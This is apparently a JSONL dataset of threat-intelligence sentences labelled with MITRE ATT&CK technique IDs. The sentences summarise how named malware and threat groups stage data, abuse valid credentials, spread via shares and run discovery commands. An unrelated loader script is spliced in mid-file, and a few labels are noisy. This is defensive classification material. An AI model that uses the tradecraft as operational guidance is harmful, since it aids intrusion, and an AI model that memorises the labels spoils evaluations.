{"text1":"Shark can use DNS in C2 communications.","labels":"['T1071.004']"}
|
|
{"text1":"Sliver can support C2 communications over DNS.","labels":"['T1071.004']"}
|
|
{"text1":"SombRAT can communicate over DNS with the C2 server.","labels":"['T1071.004']"}
|
|
{"text1":"TEXTMATE uses DNS TXT records for C2.","labels":"['T1071.004']"}
|
|
{"text1":"Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.","labels":"['T1071.004']"}
|
|
{"text1":"APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.","labels":"['T1072']"}
|
|
{"text1":"Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.","labels":"['T1072']"}
|
|
{"text1":"Kevin can create directories to store logs and other collected data.","labels":"['T1074']"}
|
|
{"text1":"Kobalos can write captured SSH connection credentials to a file under the \"\/var\/run\" directory with a \".pid\" extension for exfiltration.","labels":"['T1074']"}
|
|
{"text1":"Shark has stored information in folders named `U1` and `U2` prior to exfiltration.","labels":"['T1074']"}
|
|
{"text1":"stages collected data in a text file.","labels":"['T1074', 'T1074']"}
|
|
{"text1":"ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.","labels":"['T1074.001']"}
|
|
{"text1":"APT28 has stored captured credential information in a file named pi.log.","labels":"['T1074.001']"}
|
|
{"text1":"APT39 has utilized tools to aggregate data prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"AppleSeed can stage files in a central location prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Astaroth collects data in a plaintext file named r1.log before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Attor has staged collected data in a central upload directory prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"BADNEWS copies documents under 15MB found on the victim system to the user's \"%temp%\\SMB\\\" folder. It also copies files from USB devices to a predefined directory.","labels":"['T1074.001']"}
|
|
{"text1":"BackdoorDiplomacy has copied files of interest to the main drive's recycle bin.","labels":"['T1074.001']"}
|
|
{"text1":"BadPatch stores collected data in log files before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"BoxCaon has created a working folder for collected files that it sends to the C2 server.","labels":"['T1074.001']"}
|
|
{"text1":"Calisto uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.","labels":"['T1074.001', 'T1564.001']"}
|
|
{"text1":"Carbon creates a base directory that contains the files and folders that are collected.","labels":"['T1074.001']"}
|
|
{"text1":"Chimera has staged stolen data locally on compromised hosts.","labels":"['T1074.001']"}
|
|
{"text1":"Data captured by RawPOS is placed in a temporary file under a directory named \"memdump\".","labels":"['T1074.001']"}
|
|
{"text1":"Dragonfly 2.0 created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074.001']"}
|
|
{"text1":"Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074.001']"}
|
|
{"text1":"During Operation Honeybee, stolen data was copied into a text file using the format `From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt` prior to compression, encoding, and exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"DustySky created folders in temp directories to host collected files before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Dyre has the ability to create files in a TEMP folder to act as a database to store information.","labels":"['T1074.001']"}
|
|
{"text1":"Elise creates a file in \"AppData\\Local\\Microsoft\\Windows\\Explorer\" and stores all harvested data in that file.","labels":"['T1074.001']"}
|
|
{"text1":"Exaramel for Windows specifies a path to store files scheduled for exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"FLASHFLOOD stages data it copies from the local system or removable drives in the \"%WINDIR%\\$NtUninstallKB885884$\\\" directory.","labels":"['T1074.001']"}
|
|
{"text1":"FrameworkPOS can identify payment card track data on the victim and copy it to a local file in a subdirectory of C:\\Windows\\.","labels":"['T1074.001']"}
|
|
{"text1":"FunnyDream can stage collected information including screen captures and logged keystrokes locally.","labels":"['T1074.001']"}
|
|
{"text1":"GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.","labels":"['T1074.001']"}
|
|
{"text1":"Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.","labels":"['T1074.001']"}
|
|
{"text1":"Honeybee adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.","labels":"['T1074.001', 'T1560']"}
|
|
{"text1":"Indrik Spider has stored collected data in a .tmp file.","labels":"['T1074.001']"}
|
|
{"text1":"InvisiMole determines a working directory where it stores all the gathered data about the compromised machine.","labels":"['T1074.001']"}
|
|
{"text1":"Kazuar stages command output and collected data in files before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Kimsuky has staged collected data files under \"C:\\Program Files\\Common Files\\System\\Ole DB\\\".","labels":"['T1074.001']"}
|
|
{"text1":"Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.","labels":"['T1074.001']"}
|
|
{"text1":"Leviathan has used C:\\Windows\\Debug and C:\\Perflogs as staging directories.","labels":"['T1074.001']"}
|
|
{"text1":"LightNeuron can store email data in files and directories specified in its configuration, such as \"C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\\".","labels":"['T1074.001']"}
|
|
{"text1":"MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.","labels":"['T1074.001']"}
|
|
{"text1":"Machete created their own directories to drop files into.","labels":"['T1074.001']"}
|
|
{"text1":"Machete stores files and logs in a folder on the local drive.","labels":"['T1074.001']"}
|
|
{"text1":"Mis-Type has temporarily stored collected information to the files `\u201c%AppData%\\{Unique Identifier}\\HOSTRURKLSR\u201d` and `\u201c%AppData%\\{Unique Identifier}\\NEWERSSEMP\u201d`.","labels":"['T1074.001']"}
|
|
{"text1":"MoonWind saves information from its keylogging routine as a .zip file in the present working directory.","labels":"['T1074.001']"}
|
|
{"text1":"NETWIRE has the ability to write collected data to a file created in the \".\/LOGS\" directory.","labels":"['T1074.001']"}
|
|
{"text1":"NOKKI can collect data from the victim and stage it in \"LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp\".","labels":"['T1074.001']"}
|
|
{"text1":"ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.","labels":"['T1074.001']"}
|
|
{"text1":"Octopus has stored collected information in the Application Data directory on a compromised host.","labels":"['T1074.001']"}
|
|
{"text1":"OopsIE stages the output from command execution and collected files in specific folders before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Operation Wocao has staged archived files in a temporary directory prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"PUNCHTRACK aggregates collected data in a tmp file.","labels":"['T1074.001']"}
|
|
{"text1":"Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.","labels":"['T1074.001']"}
|
|
{"text1":"PoisonIvy stages collected data in a text file.","labels":"['T1074.001']"}
|
|
{"text1":"PowerLess can stage stolen browser data in `C:\\\\Windows\\\\Temp\\\\cup.tmp` and keylogger data in `C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.","labels":"['T1074.001']"}
|
|
{"text1":"Prikormka creates a directory, \"%USERPROFILE%\\AppData\\Local\\SKC\\\", which is used to store collected log files.","labels":"['T1074.001']"}
|
|
{"text1":"Rover copies files from removable drives to \"C:\\system\".","labels":"['T1074.001']"}
|
|
{"text1":"SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile.","labels":"['T1074.001']"}
|
|
{"text1":"STARWHALE has stored collected data in a file called `stari.txt`.","labels":"['T1074.001']"}
|
|
{"text1":"SUGARDUMP has stored collected data under `%<malware_execution_folder>%\\\\CrashLog.txt`.","labels":"['T1074.001']"}
|
|
{"text1":"Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"SombRAT can store harvested data in a custom database under the %TEMP% directory.","labels":"['T1074.001']"}
|
|
{"text1":"TeamTNT has aggregated collected credentials in text files before exfiltrating.","labels":"['T1074.001']"}
|
|
{"text1":"Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.","labels":"['T1074.001']"}
|
|
{"text1":"Turian can store copied files in a specific directory prior to exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"Ursnif has used tmp files to stage gathered information.","labels":"['T1074.001']"}
|
|
{"text1":"Zebrocy stores all collected information in a single file before exfiltration.","labels":"['T1074.001']"}
|
|
{"text1":"ccf32 can temporarily store files in a hidden directory on the local host.","labels":"['T1074.001']"}
|
|
{"text1":"APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server.","labels":"['T1074.002']"}
|
|
{"text1":"Chimera has staged stolen data on designated servers in the target environment.","labels":"['T1074.002']"}
|
|
{"text1":"During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them.","labels":"['T1074.002']"}
|
|
{"text1":"FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.","labels":"['T1074.002']"}
|
|
{"text1":"FIN8 aggregates staged data from a network into a single location.","labels":"['T1074.002']"}
|
|
{"text1":"Leviathan has staged data remotely prior to exfiltration.","labels":"['T1074.002']"}
|
|
{"text1":"Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.","labels":"['T1074.002']"}
|
|
{"text1":"UNC2452 staged data and files in password-protected archives on a victim's OWA server.","labels":"['T1074.002']"}
|
|
{"text1":"menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.","labels":"['T1074.002']"}
|
|
{"text1":"APT18 actors leverage legitimate credentials to log into external remote services.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.","labels":"['T1078']"}
|
|
{"text1":"APT29 used different compromised credentials for remote access and to move laterally.","labels":"['T1078']"}
|
|
{"text1":"APT34 has used valid administrator credentials to assist in lateral movement.","labels":"['T1078']"}
|
|
{"text1":"Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.","labels":"['T1078']"}
|
|
{"text1":"Chimera has used a valid account to maintain persistence via scheduled task.","labels":"['T1078']"}
|
|
{"text1":"Dragonfly 2.0 compromised user credentials and used valid accounts for operations.","labels":"['T1078']"}
|
|
{"text1":"Dtrack used hard-coded credentials to gain access to a network share.","labels":"['T1078']"}
|
|
{"text1":"During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.","labels":"['T1078']"}
|
|
{"text1":"FIN4 has used legitimate credentials to hijack email communications.","labels":"['T1078']"}
|
|
{"text1":"FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","labels":"['T1078']"}
|
|
{"text1":"FIN7 has harvested valid administrative credentials for lateral movement.","labels":"['T1078']"}
|
|
{"text1":"Fox Kitten has used valid credentials with various services during lateral movement.","labels":"['T1078']"}
|
|
{"text1":"GALLIUM leveraged valid accounts to maintain access to a victim network.","labels":"['T1078']"}
|
|
{"text1":"Industroyer can use supplied user credentials to execute processes and stop services.","labels":"['T1078']"}
|
|
{"text1":"Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.","labels":"['T1078']"}
|
|
{"text1":"Kinsing has used valid SSH credentials to access remote hosts.","labels":"['T1078']"}
|
|
{"text1":"Leviathan has obtained valid accounts to gain initial access.","labels":"['T1078']"}
|
|
{"text1":"Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.","labels":"['T1078']"}
|
|
{"text1":"Night Dragon has used compromised VPN accounts to gain access to victim systems.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"OilRig has used compromised credentials to access other systems on a victim network.","labels":"['T1078']"}
|
|
{"text1":"Operation Wocao has used valid VPN credentials to gain initial access.","labels":"['T1078']"}
|
|
{"text1":"POLONIUM has used valid compromised credentials to gain access to victim environments.","labels":"['T1078']"}
|
|
{"text1":"PittyTiger attempts to obtain legitimate credentials during operations.","labels":"['T1078']"}
|
|
{"text1":"Sandworm Team has used previously acquired legitimate credentials prior to attacks.","labels":"['T1078']"}
|
|
{"text1":"Silence has used compromised credentials to log on to other systems and escalate privileges.","labels":"['T1078']"}
|
|
{"text1":"Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts.","labels":"['T1078']"}
|
|
{"text1":"Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.","labels":"['T1078', 'T1114.002']"}
|
|
{"text1":"Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.","labels":"['T1078']"}
|
|
{"text1":"TEMP.Veles has used compromised VPN accounts.","labels":"['T1078']"}
|
|
{"text1":"Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.","labels":"['T1078']"}
|
|
{"text1":"To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.","labels":"['T1078']"}
|
|
{"text1":"UNC2452 used different compromised credentials for remote access and to move laterally.","labels":"['T1078']"}
|
|
{"text1":"Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers.","labels":"['T1078']"}
|
|
{"text1":"menuPass has used valid accounts, including accounts shared between Managed Service Providers and their clients, to move between the two environments.","labels":"['T1078']"}
|
|
{"text1":"HyperStack can use default credentials to connect to IPC$ shares on remote machines.","labels":"['T1078.001']"}
|
|
{"text1":"Stuxnet infected WinCC machines via a hardcoded database server password.","labels":"['T1078.001']"}
|
|
{"text1":"APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.","labels":"['T1078.002']"}
|
|
{"text1":"Chimera has used compromised domain accounts to gain access to the target environment.","labels":"['T1078.002']"}
|
|
{"text1":"Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.","labels":"['T1078.002']"}
|
|
{"text1":"CreepySnail can use stolen credentials to authenticate on target networks.","labels":"['T1078.002']"}
|
|
{"text1":"During Night Dragon, threat actors used domain accounts to gain further access to victim systems.","labels":"['T1078.002']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement.","labels":"['T1078.002']"}
|
|
{"text1":"If Shamoon cannot access shares using current privileges, it attempts access using hard-coded, domain-specific credentials gathered earlier in the intrusion.","labels":"['T1078.002']"}
|
|
{"text1":"Indrik Spider has collected credentials from infected systems, including domain accounts.","labels":"['T1078.002']"}
|
|
{"text1":"Naikon has used administrator credentials for lateral movement in compromised networks.","labels":"['T1078.002']"}
|
|
{"text1":"Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation.","labels":"['T1078.002']"}
|
|
{"text1":"Sandworm Team has used stolen credentials to access administrative accounts within the domain.","labels":"['T1078.002']"}
|
|
{"text1":"Stuxnet attempts to access network resources with a domain account\u2019s credentials.","labels":"['T1078.002']"}
|
|
{"text1":"Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.","labels":"['T1078.002']"}
|
|
{"text1":"Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.","labels":"['T1078.002']"}
|
|
{"text1":"APT29 has used compromised local accounts to access victims' networks.","labels":"['T1078.003']"}
|
|
{"text1":"APT32 has used legitimate local admin account credentials.","labels":"['T1078.003']"}
|
|
{"text1":"Cobalt Strike can use known credentials to run commands and spawn processes as a local user account.","labels":"['T1078.003']"}
|
|
{"text1":"Emotet can brute force a local admin password, then use it to facilitate lateral movement.","labels":"['T1078.003']"}
|
|
{"text1":"FIN10 has moved laterally using the Local Administrator account.","labels":"['T1078.003']"}
|
|
{"text1":"Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.","labels":"['T1078.003']"}
|
|
{"text1":"NotPetya can use valid credentials with PsExec or \"wmic\" to spread itself to remote systems.","labels":"['T1078.003']"}
|
|
{"text1":"PROMETHIUM has created admin accounts on a compromised host.","labels":"['T1078.003']"}
|
|
{"text1":"Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.","labels":"['T1078.003']"}
|
|
{"text1":"Tropic Trooper has used known administrator account credentials to execute the backdoor directly.","labels":"['T1078.003']"}
|
|
{"text1":"APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.","labels":"['T1078.004']"}
|
|
{"text1":"APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.","labels":"['T1078.004']"}
|
|
{"text1":"Ke3chang has used compromised credentials to sign into victims\u2019 Microsoft 365 accounts.","labels":"['T1078.004']"}
|
|
{"text1":"Peirates can use stolen service account tokens to perform its operations.","labels":"['T1078.004']"}
|
|
{"text1":"ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.","labels":"['T1078.004']"}
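The records above share one format that trips up anyone consuming this corpus programmatically: each line is a JSON object, but the `labels` field is a Python list literal stored as a JSON string (`"['T1078', 'T1133']"`), not a JSON array, and sub-technique IDs such as `T1078.002` need to roll up to their parent `T1078` for any per-technique count. The following loader is an added example, not part of the corpus or of any ATT&CK tooling; the separator lines it skips are the `|` lines seen above, and the embedded sample records are constructed copies of entries from this section.

```python
import ast
import json
from collections import defaultdict

# Constructed sample of the corpus format: one JSON object per record, each
# followed by two separator lines containing only "|" (as on the page above).
SAMPLE_JSONL = r'''{"text1":"APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server.","labels":"['T1074.002']"}
|
|
{"text1":"APT18 actors leverage legitimate credentials to log into external remote services.","labels":"['T1078', 'T1133']"}
|
|
{"text1":"Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation.","labels":"['T1078.002']"}
|
|
{"text1":"Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.","labels":"['T1082']"}
'''


def parse_labels(raw):
    """The 'labels' field is a Python list literal inside a JSON string
    (e.g. "['T1078', 'T1133']"). json.loads rejects the single quotes, so
    use ast.literal_eval, which evaluates literals only and never runs code.
    Anything other than a list of strings is treated as a corrupt record."""
    value = ast.literal_eval(raw)
    if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
        raise ValueError(f"unexpected labels value: {raw!r}")
    return value


def parse_records(text):
    """Yield (sentence, labels) tuples, skipping blank and '|' separator lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line == "|":
            continue
        obj = json.loads(line)
        yield obj["text1"], parse_labels(obj["labels"])


def parent_technique(tid):
    """T1078.002 -> T1078; a parent technique ID maps to itself."""
    return tid.split(".", 1)[0]


def build_index(text):
    """Map every technique ID, and the parent of every sub-technique, to the
    sentences labelled with it, so that counts for T1078 include T1078.00x."""
    index = defaultdict(list)
    for sentence, labels in parse_records(text):
        for tid in labels:
            index[tid].append(sentence)
            parent = parent_technique(tid)
            if parent != tid:
                index[parent].append(sentence)
    return dict(index)


if __name__ == "__main__":
    for tid, sentences in sorted(build_index(SAMPLE_JSONL).items()):
        print(f"{tid}: {len(sentences)} record(s)")
```

`ast.literal_eval` is the right tool here rather than `eval`: the field is attacker-adjacent text copied from threat reports, and a stray `__import__` in a label string must fail, not execute.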
|
|
{"text1":"BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.","labels":"['T1080']"}
|
|
{"text1":"Conti can spread itself by infecting other remote machines via network shared drives.","labels":"['T1080']"}
|
|
{"text1":"Darkhotel used a virus that propagates by infecting executables stored on shared drives.","labels":"['T1080']"}
|
|
{"text1":"Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives.","labels":"['T1080']"}
|
|
{"text1":"H1N1 has functionality to copy itself to network shares.","labels":"['T1080']"}
|
|
{"text1":"Ramsay can spread itself by infecting other portable executable files on network shared drives.","labels":"['T1080']"}
|
|
{"text1":"Ursnif has copied itself to and infected files in network drives for propagation.","labels":"['T1080']"}
|
|
{"text1":"4H RAT sends an OS version identifier in its beacons.","labels":"['T1082']"}
|
|
{"text1":"A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.","labels":"['T1082']"}
|
|
{"text1":"A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.","labels":"['T1082']"}
|
|
{"text1":"ADVSTORESHELL can run Systeminfo to gather information about the victim.","labels":"['T1082']"}
|
|
{"text1":"APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"APT28 has enumerated installed applications on macOS devices with built-in utilities such as \"ls -al \/Applications\".","labels":"['T1082']"}
|
|
{"text1":"APT3 has a tool that can obtain information about the local system.","labels":"['T1082']"}
|
|
{"text1":"APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host.","labels":"['T1082']"}
|
|
{"text1":"APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.","labels":"['T1082']"}
|
|
{"text1":"Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host.","labels":"['T1082']"}
|
|
{"text1":"Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.","labels":"['T1082']"}
|
|
{"text1":"Amadey has collected the computer name and OS version from a compromised machine.","labels":"['T1082']"}
|
|
{"text1":"Anchor can determine the hostname and linux version on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"AppleJeus has collected the victim host information after infection.","labels":"['T1082']"}
|
|
{"text1":"Aquatic Panda has used native OS commands to understand privilege levels and system details.","labels":"['T1082']"}
|
|
{"text1":"Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Attor monitors the free disk space on the system.","labels":"['T1082']"}
|
|
{"text1":"AuTo Stealer has the ability to collect the hostname and OS information from an infected host.","labels":"['T1082']"}
|
|
{"text1":"Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.","labels":"['T1082']"}
|
|
{"text1":"BADCALL collects the computer name and host name on the compromised system.","labels":"['T1082']"}
|
|
{"text1":"BISCUIT has a command to collect the processor type, operating system, computer name, uptime, and whether the system is a laptop or PC.","labels":"['T1082']"}
|
|
{"text1":"BLUELIGHT has collected the computer name and OS version from victim machines.","labels":"['T1082']"}
|
|
{"text1":"BUBBLEWRAP collects system information, including the operating system version and hostname.","labels":"['T1082']"}
|
|
{"text1":"BabyShark has executed the \"ver\" command.","labels":"['T1082']"}
|
|
{"text1":"BackConfig has the ability to gather the victim's computer name.","labels":"['T1082']"}
|
|
{"text1":"BadPatch collects the OS, OS version, MAC address, and the computer name from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"Bandook can collect information about the drives available on the system.","labels":"['T1082']"}
|
|
{"text1":"Bisonal has used commands and API calls to gather system information.","labels":"['T1082']"}
|
|
{"text1":"Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information.","labels":"['T1082']"}
|
|
{"text1":"Bonadan has discovered the OS version, CPU model, and RAM size of the system it has been installed on.","labels":"['T1082']"}
|
|
{"text1":"BoomBox can enumerate the hostname, domain, and IP of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Brave Prince collects hard drive content and system configuration information.","labels":"['T1082']"}
|
|
{"text1":"Bumblebee can enumerate the OS version and domain on a targeted system.","labels":"['T1082']"}
|
|
{"text1":"Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using \"\/usr\/bin\/sw_vers -productVersion\".","labels":"['T1082']"}
|
|
{"text1":"CARROTBAT has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.","labels":"['T1082']"}
|
|
{"text1":"CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.","labels":"['T1082']"}
|
|
{"text1":"CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller.","labels":"['T1082']"}
|
|
{"text1":"Cadelspy has the ability to discover information about the compromised host.","labels":"['T1082']"}
|
|
{"text1":"Cannon can gather system information from the victim\u2019s machine such as the OS version, machine name, and drive information.","labels":"['T1082']"}
|
|
{"text1":"Carberp has collected the operating system version from the infected system.","labels":"['T1082']"}
|
|
{"text1":"Cardinal RAT can collect the hostname, Microsoft Windows version, and processor architecture from a victim machine.","labels":"['T1082']"}
|
|
{"text1":"ChChes collects the victim hostname, window resolution, and Microsoft Windows version.","labels":"['T1082']"}
|
|
{"text1":"Chaes has collected system information, including the machine name and OS version.","labels":"['T1082']"}
|
|
{"text1":"CharmPower can enumerate the OS version and computer name on a targeted system.","labels":"['T1082']"}
|
|
{"text1":"Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.","labels":"['T1082']"}
|
|
{"text1":"Chrommme has the ability to list drives and obtain the computer name of a compromised host.","labels":"['T1082']"}
|
|
{"text1":"Clambling can discover the hostname, computer name, and Windows version of a targeted machine.","labels":"['T1082']"}
|
|
{"text1":"Comnie collects the hostname of the victim machine.","labels":"['T1082']"}
|
|
{"text1":"Confucius has used a file stealer that can examine system drives, including those other than the C drive.","labels":"['T1082']"}
|
|
{"text1":"CrackMapExec can enumerate the system drives and associated system name.","labels":"['T1082']"}
|
|
{"text1":"Crimson contains a command to collect the victim PC name, disk drive information, and operating system.","labels":"['T1082']"}
|
|
{"text1":"Cuba can enumerate local drives, disk type, and disk free space.","labels":"['T1082']"}
|
|
{"text1":"Cyclops Blink has the ability to query device information.","labels":"['T1082']"}
|
|
{"text1":"DarkComet can collect the computer name, RAM used, and operating system version from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"DarkWatchman can collect the OS version, system architecture, uptime, and computer name.","labels":"['T1082']"}
|
|
{"text1":"Denis collects OS information and the computer name from the victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"Derusbi gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.","labels":"['T1082']"}
|
|
{"text1":"Diavol can collect the computer name and OS version from the system.","labels":"['T1082']"}
|
|
{"text1":"DownPaper collects the victim host name and serial number, and then sends the information to the C2 server.","labels":"['T1082']"}
|
|
{"text1":"DropBook has checked for the presence of Arabic language in the infected machine's settings.","labels":"['T1082', 'T1614.001']"}
|
|
{"text1":"Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier.","labels":"['T1082']"}
|
|
{"text1":"During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts.","labels":"['T1082']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system.","labels":"['T1082']"}
|
|
{"text1":"During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.","labels":"['T1082']"}
|
|
{"text1":"DustySky extracts basic information about the operating system.","labels":"['T1082']"}
|
|
{"text1":"EVILNUM can obtain the computer name from the victim's system.","labels":"['T1082']"}
|
|
{"text1":"Egregor can perform a language check of the infected system and can query the CPU information (cpuid).","labels":"['T1082']"}
|
|
{"text1":"Elise executes \"systeminfo\" after initial communication is made to the remote server.","labels":"['T1082']"}
|
|
{"text1":"Emissary has the capability to execute ver and systeminfo commands.","labels":"['T1082']"}
|
|
{"text1":"Empire can enumerate host system information like OS, architecture, domain name, applied patches, and more.","labels":"['T1082']"}
|
|
{"text1":"EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.","labels":"['T1082']"}
|
|
{"text1":"Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.","labels":"['T1082']"}
|
|
{"text1":"Explosive has collected the computer name from the infected host.","labels":"['T1082']"}
|
|
{"text1":"FALLCHILL can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.","labels":"['T1082']"}
|
|
{"text1":"FELIXROOT collects the victim\u2019s computer name, processor architecture, OS version, volume serial number, and system type.","labels":"['T1082']"}
|
|
{"text1":"Ferocious can use \"GET.WORKSPACE\" in Microsoft Excel to determine the OS version of the compromised host.","labels":"['T1082']"}
|
|
{"text1":"Final1stspy obtains victim Microsoft Windows version information and CPU architecture.","labels":"['T1082']"}
|
|
{"text1":"GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation.","labels":"['T1082']"}
|
|
{"text1":"Gelsemium can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.","labels":"['T1082']"}
|
|
{"text1":"Gold Dragon collects endpoint information using the \"systeminfo\" command.","labels":"['T1082']"}
|
|
{"text1":"GravityRAT collects the MAC address, computer name, and CPU information.","labels":"['T1082']"}
|
|
{"text1":"Green Lambert can use `uname` to identify the operating system name, version, and processor type.","labels":"['T1082']"}
|
|
{"text1":"GrimAgent can collect the OS, and build version on a compromised host.","labels":"['T1082']"}
|
|
{"text1":"HAWKBALL can collect the OS version, architecture information, and computer name.","labels":"['T1082']"}
|
|
